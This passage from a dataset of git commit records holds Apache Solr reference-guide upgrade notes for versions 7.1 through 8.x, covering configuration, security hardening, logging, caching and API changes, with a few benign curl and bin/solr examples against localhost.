Log Files*\n\nSolr now includes a command line tool, `bin\/postlogs` which will index Solr's log files into a collection.\nThis provides an easy way to use Solr or visualization tools (such as Zeppelin) to troubleshoot problems with the system.\n\nThis tool is not yet officially documented in the Reference Guide, but draft documentation is available in a branch and can be accessed https:\/\/github.com\/apache\/lucene-solr\/blob\/visual-guide\/solr\/solr-ref-guide\/src\/logs.adoc[via GitHub].\n\n*Highlighting*\n\nSolr's Unified Highlighter now has two parameters to help control passage sizing, `hl.fragAlignRatio` and `hl.fragsizeIsMinimum`. See the section <<highlighting.adoc#the-unified-highlighter,The Unified Highlighter>> for details about these new parameters.\n\n*Shared Library System Parameter*\n\nSolr's `solr.xml` file has long had support for a `sharedLib` parameter, which allows you to define a common location for .jar files that may need to be in the path for all cores.\n\nThis property can now be defined in `solr.in.sh` or `solr.in.cmd` as a system property (`-Dsolr.sharedLib=\/path\/to\/lib`) added to `SOLR_OPTS` (see `solr.in.sh` or `solr.in.cmd` for details).\n\n=== Solr 8.4\n\nSee the https:\/\/cwiki.apache.org\/confluence\/display\/SOLR\/ReleaseNote84[8.4 Release Notes]\nfor an overview of the main new features of Solr 8.4.\n\nWhen upgrading to 8.4.x users should be aware of the following major changes from 8.3.\n\n*Package Management System*\n\nVersion 8.4 introduces a package management system to Solr. The goals of the\nsystem are to allow hot (live) deployment of plugins, provide packaging\nguidelines for plugins, and standardize Solr's approach by following familiar\nconcepts used in other package management systems.\n\nThe system is designed to eventually replace use of the `<lib ..\/>` directive,\nthe Blob Store, and other methods of deploying plugins and custom components\nto Solr.\n\nThe system is currently considered experimental, so use with caution. 
It must\nbe enabled with a system parameter passed at start up before it can be used.\nFor details, please see the section <<package-manager.adoc#package-manager,Package Management>>.\n\nWith this feature Solr's <<adding-custom-plugins-in-solrcloud-mode.adoc#adding-custom-plugins-in-solrcloud-mode,Blob Store>>\nfunctionality is now deprecated and will likely be removed in 9.0.\n\n*Security*\n\nThe follow mix of changes were all made with the intention of making Solr more secure out of the box.\n\n* The `solrconfig.xml` file in Solr's `_default` configset has been trimmed of\n the following previously pre-configured items:\n+\n** All `<lib ...\/>` directives. This means that Solr Cell (aka Tika), Learning\nto Rank, Clustering (with Carrot2), language identification, and Velocity (for\nthe `\/browse` sample search interface) are no longer enabled out of the box.\n** The `\/browse`, `\/tvrh`, and `\/update\/extract` request handlers.\n** The Term Vector Component.\n** The XSLT and Velocity response writers.\n+\nAll of these items can be added to your Solr implementation by manually editing\n`solrconfig.xml` to add them back in, or use the <<config-api.adoc#config-api,Config API>>.\n+\nThe `sample_techproducts_configs` and the examples found in `.\/example` are unchanged.\n\n* Configsets that have been uploaded with an unsecured Configset API (i.e., when authentication is not enabled) are considered \"Untrusted Configsets\".\n+\nIn order to bolster Solr's out-of-the-box security, these untrusted configsets\nare no longer allowed to use the `<lib ...\/>` directive to implement contribs\nor custom Jars.\n+\nWhen upgrading to 8.4, if you are using untrusted configsets that contain `<lib ..\/>`\ndirectives, their corresponding collections will not load (they will cease to\nwork). You have a few options in this case:\n\n** You can secure your Solr instance with <<authentication-and-authorization-plugins.adoc#authentication-and-authorization-plugins,authentication>>\nand re-upload the configset (using the `bin\/solr zk upconfig ...`\n<<solr-control-script-reference.adoc#solr-control-script-reference,Solr CLI>> command);\n** You can put your custom Jars in Solr's classpath instead of `lib` directories;\n** You can try the new package management system to manage your custom Jars.\n+\nSee the section <<configsets-api.adoc#configsets-upload,Upload a Configset>>\n for more details about trusted vs. untrusted configsets.\n\n* Our default Jetty configuration has been updated to now set a\nContent-Security-Policy (CSP) by default. See `.\/server\/etc\/jetty.xml` for\ndetails about how it is configured.\n+\nAs a result of this change, any custom HTML served by Solr's HTTP server that contains inline Javascript will no longer execute in modern browsers. The options for you are:\n\n** Change your JavaScript code to not run inline any longer;\n** Edit `jetty.xml` to remove CSP (creating weaker security protection);\n** Remove\/alter the headers with a reverse proxy.\n\n* Solr's Blob Store and runtime libs functionality are now deprecated and are planned to be removed from Solr in version 9.0. 
It has been replaced with the new package management system.\n\n* The Velocity response writer is also now deprecated and is planned to be removed from Solr in version 9.0.\n\n*Using Collapse with Group Disallowed*\n\nUsing the <<collapse-and-expand-results.adoc#collapse-and-expand-results,CollapsingQueryParser>>\nwith <<result-grouping.adoc#result-grouping,Result Grouping>> has never been\nsupported as it causes inconsistent behavior and NullPointerException errors.\nWe have now explicitly disallowed this combination to prevent these errors.\nIf you are using these together, you will need to modify your queries.\n\n*SolrJ*\n\n* SolrJ now supports the `shards.preference` parameter for single-shard\nscenarios to ensure multi-shard and single-shard request routing works in the same way.\n+\nSee <<using-solrj.adoc#cloud-request-routing,Cloud Request Routing>> and\n<<distributed-requests.adoc#shards-preference-parameter,shards.preference Parameter>> for details.\n\n* `QueryResponse.getExplainMap()` type has changed from `Map<String, String>` to `Map<String, Object>` in order to support structured explanations.\n+\nThis change is expected to be mostly back-compatible. Compiled third-party\ncomponents will work the same due to type erasure, but source code changes may\nbe required.\n\n* Replica routing code has been moved to SolrJ, making those classes available\nto clients if necessary.\n\n*Streaming Expressions*\n\n* A new DBSCAN clustering streaming evaluator has been added.\n\n* The `precision` stream evaluator can now operate on matrices.\n\n* The `random` streaming expression can now create the x-axis.\n\n*JSON Facets*\n\n* Two new aggregations have been added: `missing` and `countvals`.\n\n* Several aggregations now support multi-valued fields: `min`, `max`, `avg`, `sum`, `sumsq`, `stddev`, `variance`, and `percentile`.\n\n*Caches*\n\n* After the addition of `CaffeineCache` in 8.3, legacy SolrCache\nimplementations are deprecated and likely to be removed in 9.0.\n+\nUsers are encouraged to transition their cache configurations to use\n`org.apache.solr.search.CaffeineCache` as soon as feasible.\n\n=== Solr 8.3\n\nSee the https:\/\/cwiki.apache.org\/confluence\/display\/SOLR\/ReleaseNote83[8.3 Release Notes] for an overview of the main new features of Solr 8.3.\n\nWhen upgrading to 8.3.x users should be aware of the following major changes from 8.2.\n\n*JWT Authentication*\n\nJWT Authentication now supports multiple identity providers.\nTo allow this, the parameter `jwkUrl` has been deprecated and replaced with `jwksUrl`.\nImplementations using `jwkUrl` will continue to work as normal, but users\n should plan to transition their configurations to use `jwksUrl` instead as\n soon as feasible.\n\n*Caches*\n\n* Solr has a new cache implementation, `CaffeineCache`, which is now recommended over other caches. This cache is expected to generally provide most users lower memory footprint, higher hit ratio, and better multi-threaded performance.\n+\nSince caching has a direct impact on the performance of your Solr\n implementation, before switching to any new cache implementation in\n production, take care to test for your environment and traffic patterns so\n you fully understand the ramifications of the change.\n\n* A new parameter, `maxIdleTime`, allows automatic eviction of cache items that have not been used in the defined amount of time. 
This allows the cache to release some memory and should aid those who want or need to fine-tune their caches.\n\nSee the section <<query-settings-in-solrconfig.adoc#query-settings-in-solrconfig,Query Settings in SolrConfig>> for more details about these and other cache options and parameters.\n\n=== Solr 8.2\n\nSee the https:\/\/cwiki.apache.org\/confluence\/display\/SOLR\/ReleaseNote82[8.2 Release Notes] for an overview of the main new features of Solr 8.2.\n\nWhen upgrading to 8.2.x, users should be aware of the following major changes from v8.1.\n\n*ZooKeeper 3.5.5*\n\nSolr 8.2 updates the version of ZooKeeper included with Solr to v3.5.5.\n\nIt is recommended that external ensembles set up to work with Solr also be updated to ZooKeeper 3.5.5.\n\nThis ZooKeeper release includes many new security features.\nIn order for Solr's Admin UI to work with 3.5.5, the `zoo.cfg` file must allow access to ZooKeeper's \"four-letter commands\".\nAt a minimum, `ruok`, `conf`, and `mntr` must be enabled, but other commands can optionally be enabled if you choose.\nSee the section <<setting-up-an-external-zookeeper-ensemble.adoc#configuration-for-a-zookeeper-ensemble,Configuration for a ZooKeeper Ensemble>> for details.\n\n[WARNING]\nUntil 8.3, https:\/\/issues.apache.org\/jira\/browse\/SOLR-13672[SOLR-13672] causes the ZK Status screen in the Admin UI to not be able to report status. This only impacts the UI, ZooKeeper still operates correctly.\n\n*Routed Aliases*\n\n* Routed aliases now use collection properties to identify collections that belong to the alias; prior to 8.2, these aliases used core properties.\n+\nThis is backward-compatible and aliases created with prior versions will\n continue to work. However, new collections will no longer add the\n `routedAliasName` property to the `core.properties` file so any external code\n depending on this location will need to be updated.\n\n\/\/ TODO: aliases.adoc still says this is per-core?\n\n* Time-routed aliases now include a `TRA` infix in the collection name, in the pattern `<alias>_TRA_<timestamp>`. +\nCollections created with older versions will continue to work.\n\n*Distributed Tracing Support*\n\nThis release adds support for tracing requests in Solr. Please review the section <<solr-tracing.adoc#solr-tracing,Distributed Solr Tracing>> for details on how to configure this feature.\n\n=== Solr 8.1\n\nSee the https:\/\/cwiki.apache.org\/confluence\/display\/SOLR\/ReleaseNote810[8.1 Release Notes] for an overview of the main new features of Solr 8.1.\n\nWhen upgrading to 8.1.x, users should be aware of the following major changes from v8.0.\n\n*Global maxBooleanClauses Parameter*\n\n* The behavior of the `maxBooleanClauses` parameter has changed to reduce the risk of exponential query expansion when dealing with pathological query strings.\n+\nA default upper limit of 1024 clauses is now enforced at the node level. This was the default prior to 7.0, and it can be overridden with a new global parameter in `solr.xml`. 
This limit will be enforced for all queries whether explicitly defined by the user (or client), or created by Solr and Lucene internals.\n+\nAn identical parameter is available in `solrconfig.xml` for limiting the size of queries explicitly defined by the user (or client), but this per-collection limit will still be restricted by the global limit set in `solr.xml`.\n+\nIf your use case demands that you a lot of OR or AND clauses in your queries, upon upgrade to 8.1 you may need to adjust the global `maxBooleanClauses` parameter since between 7.0 and 8.1 the limit was effectively unbounded.\n+\nFor more information about the new parameter, see the section <<format-of-solr-xml.adoc#global-maxbooleanclauses,Format of solr.xml: maxBooleanClauses>>.\n\n*Security*\n\n* JSON Web Tokens (JWT) are now supported for authentication. These allow Solr to assert a user is already authenticated via an external identity provider, such as an OpenID Connect-enabled IdP. For more information, see the section <<jwt-authentication-plugin.adoc#jwt-authentication-plugin,JWT Authentication Plugin>>.\n\n* A new security plugin for audit logging has been added. A default class `SolrLogAuditLoggerPlugin` is available and configurable in `security.json`. The base class is also extendable for adding custom audit plugins if needed. See the section <<audit-logging.adoc#audit-logging,Audit Logging>> for more information.\n\n*Collections API*\n\n* The output of the REQUESTSTATUS command in the Collections API will now include internal asynchronous requests (if any) in the \"success\" or \"failed\" keys.\n\n* The CREATE command will now return the appropriate status code (4xx, 5xx, etc.) when the command has failed. Previously, it always returned `0`, even in failure.\n\n* The MODIFYCOLLECTION command now accepts an attribute to set a collection as read-only. This can be used to block a collection from receiving any updates while still allowing queries to be served. See the section <<collection-management.adoc#modifycollection,MODIFYCOLLECTION>> for details on how to use it.\n\n* A new command RENAME allows renaming a collection by setting up a one-to-one alias using the new name. For more information, see the section <<collection-management.adoc#rename,RENAME>>.\n\n* A new command REINDEXCOLLECTION allows indexing existing stored fields from a source collection into a new collection. For more information, please see the section <<collection-management.adoc#reindexcollection,REINDEXCOLLECTION>>.\n\n*Logging*\n\n* The default Log4j2 logging mode has been changed from synchronous to asynchronous. This will improve logging throughput and reduce system contention at the cost of a _slight_ chance that some logging messages may be missed in the event of abnormal Solr termination.\n+\nIf even this slight risk is unacceptable, the Log4j configuration file found in `server\/resources\/log4j2.xml` has the synchronous logging configuration in a commented section and can be edited to re-enable synchronous logging.\n\n*Metrics*\n\n* The SolrGangliaReporter has been removed from Solr. The metrics library used by Solr, Dropwizard Metrics, was updated to version 4, and Ganglia support was removed from it due to a dependency on the LGPL license.\n\n*Browse UI (Velocity)*\n\n* Velocity and Velocity Tools were both upgraded as part of this release. Velocity upgraded from 1.7 to 2.0. Please see https:\/\/velocity.apache.org\/engine\/2.0\/upgrading.html about upgrading. Velocity Tools upgraded from 2.0 to 3.0. 
For more details, please see https:\/\/velocity.apache.org\/tools\/3.0\/upgrading.html for details about the upgrade.\n\n*Default Garbage Collector (GC)*\n\n* Solr's default GC has been changed from CMS to G1. If you prefer to use CMS or any other GC method, you can modify the `GC_TUNE` section of `solr.in.sh` (*nix) or `solr.in.cmd` (Windows).\n\n\n== Upgrading from 7.x Releases\n\nThe upgrade from 7.x to Solr 8.0 introduces several major changes that you should be aware of before upgrading.\nThese changes are described in the section <<major-changes-in-solr-8.adoc#major-changes-in-solr-8,Major Changes in Solr 8>>. It's strongly recommended that you do a thorough review of that section before starting your upgrade.\n\n[NOTE]\nIf you run in SolrCloud mode, you must be on Solr version 7.3 or higher in order to upgrade to 8.x.\n\n== Upgrading from Pre-7.x Versions\n\nUsers upgrading from versions of Solr prior to 7.x are strongly encouraged to consult {solr-javadocs}\/changes\/Changes.html[`CHANGES.txt`] for the details of _all_ changes since the version they are upgrading from.\n\nThe upgrade from Solr 6.x to Solr 7.0 introduced several *major* changes that you should be aware of before upgrading. Please do a thorough review of the section <<major-changes-in-solr-7.adoc#major-changes-in-solr-7,Major Changes in Solr 7>> before starting your upgrade.\n\nA summary of the significant changes between Solr 5.x and Solr 6.0 is in the section <<major-changes-from-solr-5-to-solr-6.adoc#major-changes-from-solr-5-to-solr-6,Major Changes from Solr 5 to Solr 6>>.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3b326e6244937b58dcb6a500f9b59f34bf6d3ce7","subject":"SOLR-13256: Add ref-guide upgrade notes for 7.7","message":"SOLR-13256: Add ref-guide upgrade notes for 7.7\n","repos":"apache\/solr,apache\/solr,apache\/solr,apache\/solr,apache\/solr","old_file":"solr\/solr-ref-guide\/src\/solr-upgrade-notes.adoc","new_file":"solr\/solr-ref-guide\/src\/solr-upgrade-notes.adoc","new_contents":"= Solr Upgrade Notes\n:page-children: major-changes-in-solr-8, major-changes-in-solr-7, major-changes-from-solr-5-to-solr-6\n:page-toclevels: 3\n\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\nThe following notes describe changes to Solr in recent releases that you should be aware of before upgrading.\n\nThese notes highlight the biggest changes that may impact the largest number of implementations. It is not a comprehensive list of all changes to Solr in any release.\n\nWhen planning your Solr upgrade, consider the customizations you have made to your system and review the {solr-javadocs}\/changes\/Changes.html[`CHANGES.txt`] file found in your Solr package. 
That file includes all the changes and updates that may affect your existing implementation.\n\nDetailed steps for upgrading a Solr cluster are in the section <<upgrading-a-solr-cluster.adoc#upgrading-a-solr-cluster,Upgrading a Solr Cluster>>.\n\n== Upgrading to 8.x Releases\n\n=== Solr 8.1\n\n*Logging*\n\nSolr 8.1 changed the default log4j2 logging mode from synchronous to asynchronous. This will improve logging throughput and reduce system contention at the cost of a _slight_ chance that some logging messages may be missed in the event of abnormal Solr termination.\n\nIf even this slight risk is unacceptable, the Log4j configuration file `server\/resources\/log4j2.xml` has the synchronous logging configuration in a commented section and can be edited to re-enable synchronous logging.\n\n== Upgrading to 7.x Releases\n\n=== Solr 7.7\n\nSee the https:\/\/wiki.apache.org\/solr\/ReleaseNote77[7.7 Release Notes] for an overview of the main new features in Solr 7.7.\n\nWhen upgrading to Solr 7.7.x, users should be aware of the following major changes from v7.6:\n\n*Admin UI*\n\n* The Admin UI now presents a login screen for any users with authentication enabled on their cluster. Clusters with <<basic-authentication-plugin.adoc#basic-authentication-plugin,Basic Authentication>> will prompt users to enter a username and password. On clusters configured to use <<kerberos-authentication-plugin.adoc#kerberos-authentication-plugin,Kerberos Authentication>>, users will be directed to configure their browser to provide an appropriate Kerberos ticket.\n+\nThe login screen's purpose is cosmetic only: Admin UI-triggered Solr requests were subject to authentication prior to 7.7 and still are today. The login screen changes only the user experience of providing this authentication.\n\n*Distributed Requests*\n\n* The `shards` parameter, used to manually select the shards and replicas that receive distributed requests, now checks nodes against a whitelist of acceptable values for security reasons.\n+\nIn SolrCloud mode this whitelist is automatically configured to contain all live nodes. In standalone mode the whitelist is empty by default. Upgrading users who use the `shards` parameter in standalone mode can correct this value by setting the `shardsWhitelist` property in any `shardHandler` configurations in their `solrconfig.xml` file.\n+\nFor more information, see the <<distributed-requests.adoc#configuring-the-shardhandlerfactory,Distributed Request>> documentation.\n\n=== Solr 7.6\n\nSee the https:\/\/wiki.apache.org\/solr\/ReleaseNote76[7.6 Release Notes] for an overview of the main new features in Solr 7.6.\n\nWhen upgrading to Solr 7.6, users should be aware of the following major changes from v7.5:\n\n*Collections*\n\n* The JSON parameter to set cluster-wide default cluster properties with the <<collections-api.adoc#clusterprop,CLUSTERPROP>> command has changed.\n+\nThe old syntax nested the defaults into a property named `clusterDefaults`. The new syntax uses only `defaults`. 
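For reference, a sketch of the old form (the endpoint and exact payload shape here are assumptions based on the description above):\n+\n[source,bash]\n----\n# Old-style payload, nesting the defaults under \"clusterDefaults\"\ncurl -X POST 'http:\/\/localhost:8983\/api\/cluster' -H 'Content-Type: application\/json' -d '{\"set-obj-property\": {\"clusterDefaults\": {\"collection\": {\"numShards\": 2}}}}'\n----\n+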
The command to use is still `set-obj-property`.\n+\nAn example of the new syntax is:\n+\n[source,json]\n----\n{\n \"set-obj-property\": {\n \"defaults\" : {\n \"collection\": {\n \"numShards\": 2,\n \"nrtReplicas\": 1,\n \"tlogReplicas\": 1,\n \"pullReplicas\": 1\n }\n }\n }\n}\n----\n+\nThe old syntax will be supported until at least Solr 9, but users are advised to begin using the new syntax as soon as possible.\n\n* The parameter `min_rf` has been deprecated and no longer needs to be provided in order to see the achieved replication factor. This information will now always be returned to the client with the response.\n\n*Autoscaling*\n\n* An autoscaling policy is now used as the default strategy for selecting nodes on which new replicas or replicas of new collections are created.\n+\nA default policy is now in place for all users; it sorts nodes by the number of cores and by available freedisk, which means that by default the node with the fewest cores already on it and the highest available freedisk will be selected for new core creation.\n\n* The change described above has two additional impacts on the `maxShardsPerNode` parameter:\n\n. It removes the restriction against using `maxShardsPerNode` when an autoscaling policy is in place. This parameter can now always be set when creating a collection.\n. It removes the default setting of `maxShardsPerNode=1` when an autoscaling policy is in place. It will be set correctly (if required) regardless of whether an autoscaling policy is in place or not.\n+\nThe default value of `maxShardsPerNode` is still `1`. It can be set to `-1` if the old behavior of unlimited `maxShardsPerNode` is desired.\n\n*DirectoryFactory*\n\n* Lucene has introduced the `ByteBuffersDirectoryFactory` as a replacement for the `RAMDirectoryFactory`, which will be removed in Solr 9.\n+\nWhile most users are still encouraged to use the `NRTCachingDirectoryFactory`, which allows Lucene to select the best directory factory to use, if you have explicitly configured Solr to use the `RAMDirectoryFactory`, you are encouraged to switch to the new implementation as soon as possible before Solr 9 is released.\n+\nFor more information about the new directory factory, see the Jira issue https:\/\/issues.apache.org\/jira\/browse\/LUCENE-8438[LUCENE-8438].\n+\nFor more information about the directory factory configuration in Solr, see the section <<datadir-and-directoryfactory-in-solrconfig.adoc#datadir-and-directoryfactory-in-solrconfig,DataDir and DirectoryFactory in SolrConfig>>.\n\n=== Solr 7.5\n\nSee the https:\/\/wiki.apache.org\/solr\/ReleaseNote75[7.5 Release Notes] for an overview of the main new features in Solr 7.5.\n\nWhen upgrading to Solr 7.5, users should be aware of the following major changes from v7.4:\n\n*Schema Changes*\n\n* Since Solr 7.0, Solr's schema field-guessing has created `_str` fields for all `_txt` fields, and returned those by default with queries. As of 7.5, `_str` fields will no longer be returned by default. They will still be available and can be requested with the `fl` parameter on queries. 
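Requesting them explicitly might look like the following sketch (the collection and field names are assumptions for illustration):\n+\n[source,bash]\n----\n# _str copies are no longer in the default field list; ask for them via fl\ncurl 'http:\/\/localhost:8983\/solr\/gettingstarted\/select?q=*:*&fl=id,title,title_str'\n----\n+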
See also the section on <<schemaless-mode.adoc#enable-field-class-guessing,field guessing>> for more information about how schema field guessing works.\n* The Standard Filter, which has been non-operational since at least Solr v4, has been removed.\n\n*Index Merge Policy*\n\n* When using the <<indexconfig-in-solrconfig.adoc#mergepolicyfactory,`TieredMergePolicy`>>, the default merge policy for Solr, `optimize` and `expungeDeletes` now respect the `maxMergedSegmentMB` configuration parameter, which defaults to `5000` (5GB).\n+\nIf it is absolutely necessary to control the number of segments present after optimize, specify `maxSegments` as a positive integer. Values of `maxSegments` higher than `1` are honored on a \"best effort\" basis.\n+\nThe `TieredMergePolicy` will also reclaim resources from segments that exceed `maxMergedSegmentMB` more aggressively than before.\n\n*UIMA Removed*\n\n* The UIMA contrib has been removed from Solr and is no longer available.\n\n*Logging*\n\n* Solr's logging configuration file is now located in `server\/resources\/log4j2.xml` by default.\n\n* A bug for Windows users has been corrected. When using Solr's examples (`bin\/solr start -e`), log files will now be put in the correct location (`example\/` instead of `server`). See also <<installing-solr.adoc#solr-examples,Solr Examples>> and <<solr-control-script-reference.adoc#solr-control-script-reference,Solr Control Script Reference>> for more information.\n\n\n=== Solr 7.4\n\nSee the https:\/\/wiki.apache.org\/solr\/ReleaseNote74[7.4 Release Notes] for an overview of the main new features in Solr 7.4.\n\nWhen upgrading to Solr 7.4, users should be aware of the following major changes from v7.3:\n\n*Logging*\n\n* Solr now uses Log4j v2.11. The Log4j configuration is now in `log4j2.xml` rather than `log4j.properties` files. This is a server-side change only, and clients using SolrJ won't need any changes. Clients can still use any logging implementation that is compatible with SLF4J. We now let Log4j handle rotation of Solr logs at startup, and `bin\/solr` start scripts will no longer attempt this nor move existing console or garbage collection logs into `logs\/archived`. See <<configuring-logging.adoc#configuring-logging,Configuring Logging>> for more details about Solr logging.\n\n* Configuring `slowQueryThresholdMillis` now logs slow requests to a separate file named `solr_slow_requests.log`. Previously they would get logged in the `solr.log` file.\n\n*Legacy Scaling (non-SolrCloud)*\n\n* In the <<index-replication.adoc#index-replication,master-slave model>> of scaling Solr, a slave no longer commits an empty index when a completely new index is detected on master during replication. To return to the previous behavior, pass `false` to `skipCommitOnMasterVersionZero` in the slave section of the replication handler configuration, or pass it to the `fetchindex` command.\n\nIf you are upgrading from a version earlier than Solr 7.3, please see previous version notes below.\n\n=== Solr 7.3\n\nSee the https:\/\/wiki.apache.org\/solr\/ReleaseNote73[7.3 Release Notes] for an overview of the main new features in Solr 7.3.\n\nWhen upgrading to Solr 7.3, users should be aware of the following major changes from v7.2:\n\n*ConfigSets*\n\n* Collections created without specifying a configset name have used a copy of the `_default` configset since Solr 7.0. Before 7.3, the copied configset was named the same as the collection name, but from 7.3 onwards it will be named with a new \".AUTOCREATED\" suffix. This is to prevent overwriting custom configset names.
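+\nFor example (the collection name is an assumption), creating a collection without specifying a configset now produces a copy named with the suffix:\n+\n[source,bash]\n----\n# With no -n or -d configset options, Solr copies _default and names the\n# copy \"mycollection.AUTOCREATED\" rather than \"mycollection\"\nbin\/solr create -c mycollection\n----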
\n\n*Learning to Rank*\n\n* The `rq` parameter used with Learning to Rank `rerank` query parsing no longer considers the `defType` parameter. See <<learning-to-rank.adoc#running-a-rerank-query,Running a Rerank Query>> for more information about this parameter.\n\n*Autoscaling & AutoAddReplicas*\n\n* The autoscaling system now pauses execution of all triggers between the start of actions and the end of a cool down period; triggers resume after the cool down period expires. Previously, the cool down period was a fixed period that started after the actions for a trigger event completed; during this time all triggers continued to run, but any events were rejected and tried later.\n\n* The throttling mechanism used to limit the rate of autoscaling events processed has been removed. This deprecates the `actionThrottlePeriodSeconds` setting in the <<solrcloud-autoscaling-api.adoc#change-autoscaling-properties,`set-properties` Autoscaling API>>, which is now non-operational. Use the `triggerCooldownPeriodSeconds` parameter instead to pause event processing.\n\n* The default value of `autoReplicaFailoverWaitAfterExpiration`, used with the AutoAddReplicas feature, has increased to 120 seconds from the previous default of 30 seconds. This affects how soon Solr adds new replicas to replace the replicas on nodes that have either crashed or shut down.\n\n*Logging*\n\n* The default Solr log file size and number of backups have been raised to 32MB and 10, respectively. See the section <<configuring-logging.adoc#configuring-logging,Configuring Logging>> for more information about how to configure logging.\n\n*SolrCloud*\n\n* The old Leader-In-Recovery implementation (implemented in Solr 4.9) is now deprecated and replaced. Solr will support rolling upgrades from old 7.x versions of Solr to future 7.x releases until the last release of the 7.x major version.\n+\nThis means that to upgrade to Solr 8 in the future, you will need to be on Solr 7.3 or higher.\n\n* Replicas which are not up-to-date are no longer allowed to become leader. Use the <<collections-api.adoc#forceleader,FORCELEADER command>> of the Collections API to allow these replicas to become leader.\n\n*Spatial*\n\n* If you are using the spatial JTS library with Solr, you must upgrade to 1.15.0. This new version of JTS is now dual-licensed to include a BSD-style license. See the section on <<spatial-search.adoc#spatial-search,Spatial Search>> for more information.\n\n*Highlighting*\n\n* The top-level `<highlighting>` element in `solrconfig.xml` is now officially deprecated in favor of the equivalent `<searchComponent>` syntax. This element has been out of use in default Solr installations for several releases already.\n\nIf you are upgrading from a version earlier than Solr 7.2, please see previous version notes below.\n\n=== Solr 7.2\n\nSee the https:\/\/wiki.apache.org\/solr\/ReleaseNote72[7.2 Release Notes] for an overview of the main new features in Solr 7.2.\n\nWhen upgrading to Solr 7.2, users should be aware of the following major changes from v7.1:\n\n*Local Parameters*\n\n* Starting a query string with <<local-parameters-in-queries.adoc#local-parameters-in-queries,local parameters>> `{!myparser ...}` is used to switch from one query parser to another, and is intended for use by Solr system developers, not end users doing searches. 
To reduce negative side-effects of unintended hack-ability, Solr now limits the cases when local parameters will be parsed to only contexts in which the default parser is \"<<other-parsers.adoc#lucene-query-parser,lucene>>\" or \"<<other-parsers.adoc#function-query-parser,func>>\".\n+\nSo, if `defType=edismax` then `q={!myparser ...}` won't work. In that example, put the desired query parser into the `defType` parameter.\n+\nAnother example is if `defType=edismax` then `hl.q={!myparser ...}` won't work for the same reason. In this example, either put the desired query parser into the `hl.qparser` parameter or set `hl.qparser=lucene`. Most users won't run into these cases but some will need to change.\n+\nIf you must have full backwards compatibility, use `luceneMatchVersion=7.1.0` or an earlier version.\n\n*eDisMax Parser*\n\n* The eDisMax parser by default no longer allows subqueries that specify a Solr parser using either local parameters, or the older `\\_query_` magic field trick.\n+\nFor example, `{!prefix f=myfield v=enterp}` or `\\_query_:\"{!prefix f=myfield v=enterp}\"` are not supported by default any longer. If you want to allow power-users to do this, set `uf=* _query_` or some other value that includes `\\_query_`.\n+\nIf you need full backwards compatibility for the time being, use `luceneMatchVersion=7.1.0` or something earlier.\n\nIf you are upgrading from a version earlier than Solr 7.1, please see previous version notes below.\n\n=== Solr 7.1\n\nSee the https:\/\/wiki.apache.org\/solr\/ReleaseNote71[7.1 Release Notes] for an overview of the main new features of Solr 7.1.\n\nWhen upgrading to Solr 7.1, users should be aware of the following major changes from v7.0:\n\n*AutoAddReplicas*\n\n* The feature to automatically add replicas if a replica goes down, previously available only when storing indexes in HDFS, has been ported to the autoscaling framework. Due to this, `autoAddReplicas` is now available to all users even if their indexes are on local disks.\n+\nExisting users of this feature should not have to change anything. However, they should note these changes:\n\n** Behavior: Changing the `autoAddReplicas` property from disabled (`false`) to enabled (`true`) using <<collections-api.adoc#modifycollection,MODIFYCOLLECTION API>> no longer replaces down replicas for the collection immediately. Instead, replicas are only added if a node containing them went down while `autoAddReplicas` was enabled. 
The parameters `autoReplicaFailoverBadNodeExpiration` and `autoReplicaFailoverWorkLoopDelay` are no longer used.\n** Deprecations: Enabling\/disabling autoAddReplicas cluster-wide with the API will be deprecated; use suspend\/resume trigger APIs with `name=\".auto_add_replicas\"` instead.\n+\nMore information about the changes to this feature can be found in the section <<solrcloud-autoscaling-auto-add-replicas.adoc#solrcloud-autoscaling-auto-add-replicas,SolrCloud Automatically Adding Replicas>>.\n\n*Metrics Reporters*\n\n* Shard and cluster metric reporter configuration now requires a `class` attribute.\n** If a reporter configures the `group=\"shard\"` attribute then please also configure the `class=\"org.apache.solr.metrics.reporters.solr.SolrShardReporter\"` attribute.\n** If a reporter configures the `group=\"cluster\"` attribute then please also configure the `class=\"org.apache.solr.metrics.reporters.solr.SolrClusterReporter\"` attribute.\n+\nSee the section <<metrics-reporting.adoc#shard-and-cluster-reporters,Shard and Cluster Reporters>> for more information.\n\n*Streaming Expressions*\n\n* All Stream Evaluators in `solrj.io.eval` have been refactored to have a simpler and more robust structure. This simplifies and condenses the code required to implement a new Evaluator and makes it much easier for evaluators to handle differing data types (primitives, objects, arrays, lists, and so forth).\n\n*ReplicationHandler*\n\n* In the ReplicationHandler, the `master.commitReserveDuration` sub-element is deprecated. Instead please configure a direct `commitReserveDuration` element for use in all modes (master, slave, cloud).\n\n*RunExecutableListener*\n\n* The `RunExecutableListener` was removed for security reasons. If you want to listen to events caused by updates, commits, or optimize, write your own listener as a native Java class as part of a Solr plugin.\n\n*XML Query Parser*\n\n* In the XML query parser (`defType=xmlparser` or `{!xmlparser ... }`) the resolving of external entities is now disallowed by default.\n\nIf you are upgrading from a version earlier than Solr 7.0, please see <<major-changes-in-solr-7.adoc#major-changes-in-solr-7,Major Changes in Solr 7>> before starting your upgrade.\n\n== Upgrading to 7.x from Any 6.x Release\n\nThe upgrade from Solr 6.x to Solr 7.0 introduces several *major* changes that you should be aware of before upgrading. Please do a thorough review of the section <<major-changes-in-solr-7.adoc#major-changes-in-solr-7,Major Changes in Solr 7>> before starting your upgrade.\n\n== Upgrading to 7.x from pre-6.x Versions of Solr\n\nUsers upgrading from versions of Solr prior to 6.x are strongly encouraged to consult {solr-javadocs}\/changes\/Changes.html[`CHANGES.txt`] for the details of _all_ changes since the version they are upgrading from.\n\nA summary of the significant changes between Solr 5.x and Solr 6.0 is in the section <<major-changes-from-solr-5-to-solr-6.adoc#major-changes-from-solr-5-to-solr-6,Major Changes from Solr 5 to Solr 6>>.\n","old_contents":"= 